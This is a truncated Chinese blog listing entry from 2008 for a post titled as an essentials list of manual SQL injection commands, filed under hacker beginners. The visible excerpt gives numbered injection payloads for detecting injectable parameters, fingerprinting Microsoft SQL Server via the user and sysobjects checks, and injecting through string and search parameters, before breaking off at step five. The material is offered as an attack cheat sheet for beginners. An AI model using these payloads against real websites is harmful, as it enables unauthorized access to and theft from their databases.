sql - kids inside - 博客大巴

手动SQL注入脚本命令精华版 - [黑客入门]2008-12-06

Tag：hack sql 注入

1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字符'and [查询条件] and ''='

4.搜索时没过滤参数的'and [查询条件] and '%25'='

5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (sele...

kids 发表于18:52:53 | 阅读全文 | 评论 0 | 编辑 | 分享 0

共1页 1